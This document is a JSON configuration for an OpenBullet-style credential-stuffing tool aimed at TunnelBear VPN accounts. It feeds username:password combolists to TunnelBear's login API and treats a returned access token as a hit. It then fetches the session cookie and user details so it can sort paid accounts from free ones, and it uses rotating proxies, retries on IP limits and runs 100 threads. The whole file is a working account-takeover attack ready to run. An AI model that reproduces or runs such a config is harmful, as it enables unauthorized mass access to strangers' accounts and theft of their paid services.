{
  "version": 1,
  "metadata": {
    "name": "New Config 1",
    "author": "",
    "created": "2026-03-05T08:59:35.353+00:00",
    "modified": "2026-03-05T08:59:35.353+00:00"
  },
  "pipeline": {
    "id": "33ea75cb-7bc7-40ce-9664-da961de9a80e",
    "name": "New Config 1",
    "author": "",
    "created": "2026-03-05T08:59:35.353Z",
    "modified": "2026-03-05T08:59:35.353Z",
    "blocks": [
      {
        "id": "2d26c852-864b-497f-9c9b-c3d68e6b5a53",
        "block_type": "GenerateGUID",
        "label": "Generate GUID",
        "disabled": false,
        "safe_mode": false,
        "settings": {
          "type": "GenerateGUID",
          "guid_version": "V4",
          "namespace": "",
          "name": "",
          "output_var": "GUID",
          "capture": true
        }
      },
      {
        "id": "5484c40e-4ba5-40e0-9614-6eda9069662a",
        "block_type": "HttpRequest",
        "label": "HTTP Request",
        "disabled": false,
        "safe_mode": false,
        "settings": {
          "type": "HttpRequest",
          "method": "POST",
          "url": "https://prod-api-dashboard.tunnelbear.com/dashboard/web/v2/token",
          "headers": [
            [
              "Host",
              "prod-api-dashboard.tunnelbear.com"
            ],
            [
              "User-Agent",
              "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0"
            ],
            [
              "Accept",
              "application/json, text/plain, */*"
            ],
            [
              "Accept-Language",
              "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3"
            ],
            [
              "Accept-Encoding",
              "gzip, deflate, br, zstd"
            ],
            [
              "Content-Type",
              "application/json"
            ],
            [
              "tunnelbear-app-id",
              "com.tunnelbear.web"
            ],
            [
              "tunnelbear-app-version",
              "1.0.0"
            ],
            [
              "tunnelbear-platform",
              "Firefox"
            ],
            [
              "tunnelbear-platform-version",
              "146"
            ],
            [
              "Origin",
              "https://www.tunnelbear.com"
            ],
            [
              "Connection",
              "keep-alive"
            ],
            [
              "Referer",
              "https://www.tunnelbear.com/"
            ]
          ],
          "body": "{\"username\":\"<input.USER>\",\"password\":\"<input.PASS>\",\"grant_type\":\"password\",\"device\":\"browser-<GUID>\"}",
          "body_type": "Raw",
          "content_type": "application/x-www-form-urlencoded",
          "follow_redirects": true,
          "max_redirects": 8,
          "timeout_ms": 10000,
          "auto_redirect": true,
          "basic_auth": null,
          "http_version": "HTTP/1.1",
          "response_var": "SOURCE",
          "custom_cookies": "",
          "ssl_verify": true,
          "cipher_suites": "",
          "tls_client": "RustTLS",
          "browser_profile": "",
          "ja3_override": "",
          "http2fp_override": "",
          "wreq_emulation": ""
        }
      },
      {
        "id": "4bad33d5-fce5-4b69-a903-42f0ac5a58ef",
        "block_type": "KeyCheck",
        "label": "Key Check",
        "disabled": false,
        "safe_mode": false,
        "settings": {
          "type": "KeyCheck",
          "keychains": [
            {
              "result": "Fail",
              "conditions": [
                {
                  "source": "data.SOURCE",
                  "comparison": "Contains",
                  "value": "Parece que n\u00e3o estamos conseguindo encontrar esta combina\u00e7\u00e3o de e-mail e senha. Tentar outra?"
                },
                {
                  "source": "data.SOURCE",
                  "comparison": "Contains",
                  "value": "\"error_code\":10001"
                },
                {
                  "source": "data.SOURCE",
                  "comparison": "Contains",
                  "value": "We cant seem to find that email and password combination"
                }
              ],
              "mode": "Or"
            },
            {
              "result": "Success",
              "conditions": [
                {
                  "source": "data.SOURCE",
                  "comparison": "Contains",
                  "value": "\"access_token\":\""
                }
              ],
              "mode": "And"
            }
          ],
          "stop_on_fail": true
        }
      },
      {
        "id": "8e3002c1-cbea-44dc-977a-3a2ef31224ad",
        "block_type": "Parse",
        "label": "Access_token",
        "disabled": false,
        "safe_mode": true,
        "settings": {
          "type": "Parse",
          "parse_mode": "Json",
          "input_var": "data.SOURCE",
          "output_var": "ATK",
          "capture": true,
          "left": "",
          "right": "",
          "recursive": false,
          "case_insensitive": false,
          "pattern": "",
          "output_format": "$1",
          "multi_line": false,
          "json_path": "access_token",
          "selector": "",
          "attribute": "innerText",
          "index": 0,
          "xpath": "",
          "cookie_name": "",
          "lambda_expression": "x => x.split(',')[0]"
        }
      },
      {
        "id": "70a083a8-87c3-4808-b4ae-a6e82144e116",
        "block_type": "HttpRequest",
        "label": "HTTP Request",
        "disabled": false,
        "safe_mode": true,
        "settings": {
          "type": "HttpRequest",
          "method": "POST",
          "url": "https://prod-api-dashboard.tunnelbear.com/dashboard/web/v2/tokenCookie",
          "headers": [
            [
              "Content-Type",
              "application/x-www-form-urlencoded"
            ],
            [
              "Sec-Ch-Ua-Platform",
              "\"Windows\""
            ],
            [
              "Authorization",
              "Bearer <ATK>"
            ],
            [
              "Accept-Language",
              "pt-BR,pt;q=0.9"
            ],
            [
              "Sec-Ch-Ua",
              "\"Chromium\";v=\"129\", \"Not=A?Brand\";v=\"8\""
            ],
            [
              "Sec-Ch-Ua-Mobile",
              "?0"
            ],
            [
              "Tunnelbear-App-Version",
              "1.0.0"
            ],
            [
              "Tunnelbear-Platform",
              "Chrome"
            ],
            [
              "Tb-Csrf-Token",
              "d15a5e0aa5692dbfbb436da2ef8e6223465c4dae"
            ],
            [
              "User-Agent",
              "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
            ],
            [
              "Accept",
              "application/json, text/plain, */*"
            ],
            [
              "Tunnelbear-Platform-Version",
              "129"
            ],
            [
              "Content-Type",
              "application/x-www-form-urlencoded;charset=utf-8"
            ],
            [
              "Tunnelbear-App-Id",
              "com.tunnelbear.web"
            ],
            [
              "Origin",
              "https://www.tunnelbear.com"
            ],
            [
              "Sec-Fetch-Site",
              "same-site"
            ],
            [
              "Sec-Fetch-Mode",
              "cors"
            ],
            [
              "Sec-Fetch-Dest",
              "empty"
            ],
            [
              "Referer",
              "https://www.tunnelbear.com/"
            ],
            [
              "Accept-Encoding",
              "gzip, deflate, br"
            ],
            [
              "Priority",
              "u=1, i"
            ]
          ],
          "body": "",
          "body_type": "None",
          "content_type": "application/x-www-form-urlencoded",
          "follow_redirects": true,
          "max_redirects": 8,
          "timeout_ms": 10000,
          "auto_redirect": true,
          "basic_auth": null,
          "http_version": "HTTP/1.1",
          "response_var": "SOURCE",
          "custom_cookies": "",
          "ssl_verify": true,
          "cipher_suites": "",
          "tls_client": "RustTLS",
          "browser_profile": "",
          "ja3_override": "",
          "http2fp_override": "",
          "wreq_emulation": ""
        }
      },
      {
        "id": "2255d057-406e-482e-99ae-3dfd0400fce3",
        "block_type": "Parse",
        "label": "PLAY_SESSION",
        "disabled": false,
        "safe_mode": true,
        "settings": {
          "type": "Parse",
          "parse_mode": "Cookie",
          "input_var": "data.SOURCE.COOKIES",
          "output_var": "PLAYSESSION",
          "capture": true,
          "left": "",
          "right": "",
          "recursive": false,
          "case_insensitive": false,
          "pattern": "",
          "output_format": "$1",
          "multi_line": false,
          "json_path": "PLAY_SESSION",
          "selector": "",
          "attribute": "innerText",
          "index": 0,
          "xpath": "",
          "cookie_name": "PLAY_SESSION",
          "lambda_expression": "x => x.split(',')[0]"
        }
      },
      {
        "id": "6cecab56-5c40-494d-af50-89b97831bd6a",
        "block_type": "HttpRequest",
        "label": "HTTP Request",
        "disabled": false,
        "safe_mode": true,
        "settings": {
          "type": "HttpRequest",
          "method": "GET",
          "url": "https://prod-api-core.tunnelbear.com/core/web/api/getUserDetails",
          "headers": [
            [
              "Host",
              "prod-api-core.tunnelbear.com"
            ],
            [
              "Cookie",
              "PLAY_SESSION=<PLAYSESSION>"
            ],
            [
              "Sec-Ch-Ua-Platform",
              "\"Windows\""
            ],
            [
              "Accept-Language",
              "pt-BR,pt;q=0.9"
            ],
            [
              "Sec-Ch-Ua",
              "\"Chromium\";v=\"129\", \"Not=A?Brand\";v=\"8\""
            ],
            [
              "Sec-Ch-Ua-Mobile",
              "?0"
            ],
            [
              "Tunnelbear-App-Version",
              "1.0.0"
            ],
            [
              "Tunnelbear-Platform",
              "Chrome"
            ],
            [
              "Tb-Csrf-Token",
              "d15a5e0aa5692dbfbb436da2ef8e6223465c4dae"
            ],
            [
              "User-Agent",
              "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
            ],
            [
              "Accept",
              "application/json, text/plain, */*"
            ],
            [
              "Tunnelbear-Platform-Version",
              "129"
            ],
            [
              "Content-Type",
              "application/x-www-form-urlencoded;charset=utf-8"
            ],
            [
              "Tunnelbear-App-Id",
              "com.tunnelbear.web"
            ],
            [
              "Origin",
              "https://www.tunnelbear.com"
            ],
            [
              "Sec-Fetch-Site",
              "same-site"
            ],
            [
              "Sec-Fetch-Mode",
              "cors"
            ],
            [
              "Sec-Fetch-Dest",
              "empty"
            ],
            [
              "Referer",
              "https://www.tunnelbear.com/"
            ],
            [
              "Accept-Encoding",
              "gzip, deflate, br"
            ],
            [
              "Priority",
              "u=1, i"
            ]
          ],
          "body": "",
          "body_type": "None",
          "content_type": "application/x-www-form-urlencoded",
          "follow_redirects": true,
          "max_redirects": 8,
          "timeout_ms": 10000,
          "auto_redirect": true,
          "basic_auth": null,
          "http_version": "HTTP/1.1",
          "response_var": "USERDETAILS",
          "custom_cookies": "",
          "ssl_verify": true,
          "cipher_suites": "",
          "tls_client": "RustTLS",
          "browser_profile": "",
          "ja3_override": "",
          "http2fp_override": "",
          "wreq_emulation": ""
        }
      },
      {
        "id": "8ae4ea80-96d0-4166-b544-b8b8554ffefd",
        "block_type": "Parse",
        "label": "FullVersion",
        "disabled": false,
        "safe_mode": true,
        "settings": {
          "type": "Parse",
          "parse_mode": "Json",
          "input_var": "data.USERDETAILS",
          "output_var": "FullVersion",
          "capture": true,
          "left": "",
          "right": "",
          "recursive": false,
          "case_insensitive": false,
          "pattern": "",
          "output_format": "$1",
          "multi_line": false,
          "json_path": "fullVersion",
          "selector": "",
          "attribute": "innerText",
          "index": 0,
          "xpath": "",
          "cookie_name": "",
          "lambda_expression": "x => x.split(',')[0]"
        }
      },
      {
        "id": "6ff5ad1e-4a0c-45b6-9658-5fc66c6d5abc",
        "block_type": "Parse",
        "label": "BearType",
        "disabled": false,
        "safe_mode": true,
        "settings": {
          "type": "Parse",
          "parse_mode": "Json",
          "input_var": "data.USERDETAILS",
          "output_var": "BearType",
          "capture": true,
          "left": "",
          "right": "",
          "recursive": false,
          "case_insensitive": false,
          "pattern": "",
          "output_format": "$1",
          "multi_line": false,
          "json_path": "bearType",
          "selector": "",
          "attribute": "innerText",
          "index": 0,
          "xpath": "",
          "cookie_name": "",
          "lambda_expression": "x => x.split(',')[0]"
        }
      },
      {
        "id": "7b019c1d-4488-4658-ae73-972ef414e3c3",
        "block_type": "Parse",
        "label": "PaymentStatus",
        "disabled": false,
        "safe_mode": true,
        "settings": {
          "type": "Parse",
          "parse_mode": "Json",
          "input_var": "data.USERDETAILS",
          "output_var": "PaymentStatus",
          "capture": true,
          "left": "",
          "right": "",
          "recursive": false,
          "case_insensitive": false,
          "pattern": "",
          "output_format": "$1",
          "multi_line": false,
          "json_path": "paymentStatus",
          "selector": "",
          "attribute": "innerText",
          "index": 0,
          "xpath": "",
          "cookie_name": "",
          "lambda_expression": "x => x.split(',')[0]"
        }
      },
      {
        "id": "f4d413da-3d4d-4dba-9031-071708976fe5",
        "block_type": "Parse",
        "label": "IsDunning",
        "disabled": false,
        "safe_mode": true,
        "settings": {
          "type": "Parse",
          "parse_mode": "Json",
          "input_var": "data.USERDETAILS",
          "output_var": "IsDunning",
          "capture": true,
          "left": "",
          "right": "",
          "recursive": false,
          "case_insensitive": false,
          "pattern": "",
          "output_format": "$1",
          "multi_line": false,
          "json_path": "isDunning",
          "selector": "",
          "attribute": "innerText",
          "index": 0,
          "xpath": "",
          "cookie_name": "",
          "lambda_expression": "x => x.split(',')[0]"
        }
      },
      {
        "id": "4767932f-05d5-4e93-a82e-b3046e9a8f0b",
        "block_type": "Parse",
        "label": "YearlyPurchase",
        "disabled": false,
        "safe_mode": true,
        "settings": {
          "type": "Parse",
          "parse_mode": "Json",
          "input_var": "data.USERDETAILS",
          "output_var": "YearlyPurchase",
          "capture": true,
          "left": "",
          "right": "",
          "recursive": false,
          "case_insensitive": false,
          "pattern": "",
          "output_format": "$1",
          "multi_line": false,
          "json_path": "yearlyPurchase",
          "selector": "",
          "attribute": "innerText",
          "index": 0,
          "xpath": "",
          "cookie_name": "",
          "lambda_expression": "x => x.split(',')[0]"
        }
      },
      {
        "id": "895fc39d-9b03-43e0-b3cc-57ddf1a0201f",
        "block_type": "KeyCheck",
        "label": "Key Check",
        "disabled": false,
        "safe_mode": false,
        "settings": {
          "type": "KeyCheck",
          "keychains": [
            {
              "result": "Custom",
              "conditions": [
                {
                  "source": "PaymentStatus",
                  "comparison": "EqualTo",
                  "value": "FREE"
                },
                {
                  "source": "PaymentStatus",
                  "comparison": "NotEqualTo",
                  "value": ""
                }
              ],
              "mode": "And"
            },
            {
              "result": "Retry",
              "conditions": [
                {
                  "source": "data.USERDETAILS",
                  "comparison": "Contains",
                  "value": "IP limit reached"
                }
              ],
              "mode": "And"
            },
            {
              "result": "Success",
              "conditions": [
                {
                  "source": "PaymentStatus",
                  "comparison": "NotEqualTo",
                  "value": "FREE"
                },
                {
                  "source": "PaymentStatus",
                  "comparison": "NotEqualTo",
                  "value": ""
                }
              ],
              "mode": "And"
            }
          ],
          "stop_on_fail": false
        }
      }
    ],
    "startup_blocks": [],
    "data_settings": {
      "wordlist_type": "Combolist",
      "separator": ":",
      "slices": [
        "USER",
        "PASS"
      ]
    },
    "proxy_settings": {
      "proxy_mode": "Rotate",
      "proxy_sources": [],
      "ban_duration_secs": 300,
      "max_retries_before_ban": 3,
      "cpm_per_proxy": 0,
      "proxy_groups": [],
      "active_group": ""
    },
    "browser_settings": {
      "browser": "chrome",
      "ja3": null,
      "http2_fingerprint": null,
      "user_agent": null
    },
    "runner_settings": {
      "threads": 100,
      "skip": 0,
      "take": 0,
      "continue_statuses": [
        "Retry"
      ],
      "custom_status_name": "CUSTOM",
      "max_retries": 3,
      "concurrent_per_proxy": 0,
      "start_threads_gradually": false,
      "gradual_delay_ms": 100,
      "automatic_thread_count": false,
      "lower_threads_on_retry": false,
      "retry_thread_reduction_pct": 25,
      "pause_on_ratelimit": false,
      "only_proxyless": false
    },
    "output_settings": {
      "save_to_file": true,
      "save_to_database": false,
      "include_response": false,
      "output_directory": "results",
      "output_format": "{data} | {captures}",
      "database_path": "",
      "output_format_type": "Txt",
      "capture_filters": []
    }
  }
}